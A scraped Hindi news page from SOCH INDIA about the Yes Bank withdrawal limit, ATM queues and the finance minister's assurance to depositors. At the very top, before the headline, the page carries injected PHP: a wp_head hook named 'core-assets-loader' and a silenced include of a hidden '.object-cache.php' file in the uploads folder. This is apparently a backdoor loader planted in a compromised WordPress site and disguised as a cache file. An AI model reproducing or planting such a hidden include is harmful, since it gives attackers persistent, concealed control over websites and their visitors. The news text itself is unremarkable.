add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बोलीं वित्त मंत्री- किसी खाताधारक का पैसा नहीं डूबने देंगे – SOCH INDIA
Menu

देश
बोलीं वित्त मंत्री- किसी खाताधारक का पैसा नहीं डूबने देंगे

nobanner

आरबीआई ने निजी क्षेत्र की कंपनी यस बैंक पर जैसे ही 50 हजार की निकासी की लिमिट लगाई, उसके ग्राहकों में हड़कंप मच गया. देश के तमाम शहरों में एटीएम के बाहर पैसे निकालने वालों की कतार लग गई. कई शहरों में अफरातफरी का माहौल भी देखने को मिला. शुक्रवार को मुंबई और अहमदाबाद में यस बैंक के ग्राहक काफी परेशान दिखे. वो सुबह-सुबह एटीएम पहुंचे लेकिन उन्हें निराशा हाथ लगी. इस दौरान पैसे निकालने की हड़बड़ी में कई जगहों पर हालात बेकाबू दिखे, जिसके बाद एटीएम के बाहर पुलिस तैनात की गई.

इस बीच, यस बैंक संकट पर केंद्री वित्त मंत्री निर्मला सीतारमण ने खाताधारकों को भरोसा दिया है कि उनका पैसा डूबने नहीं दिया जाएगा.

यस बैंक मामले को लेकर एसबीआई के चेयरमैन रजनीश कुमार ने वित्त मंत्री निर्मला सीतारमण से मुलाकात की और कहा पैनिक करने की जरूरत नहीं है. हम लोग सिस्टम बना रहे हैं. ग्राहकों के जमा किए हुए पैसे पूरी तरह से सुरक्षित हैं.

वोडाफोन के मुखिया ने भी वित्त मंत्री से मुलाकात की लेकिन मुलाकात के बाद उन्होंने मीडिया से बात करने से इनकार कर दिया. SEBI के चेयरमैन अजय त्यागी ने वित्त मंत्री निर्मला सीतारमण से मुलाकात करेंगे. वो यस बैंक संकट समेत कई मुद्दों पर बात करेंगे.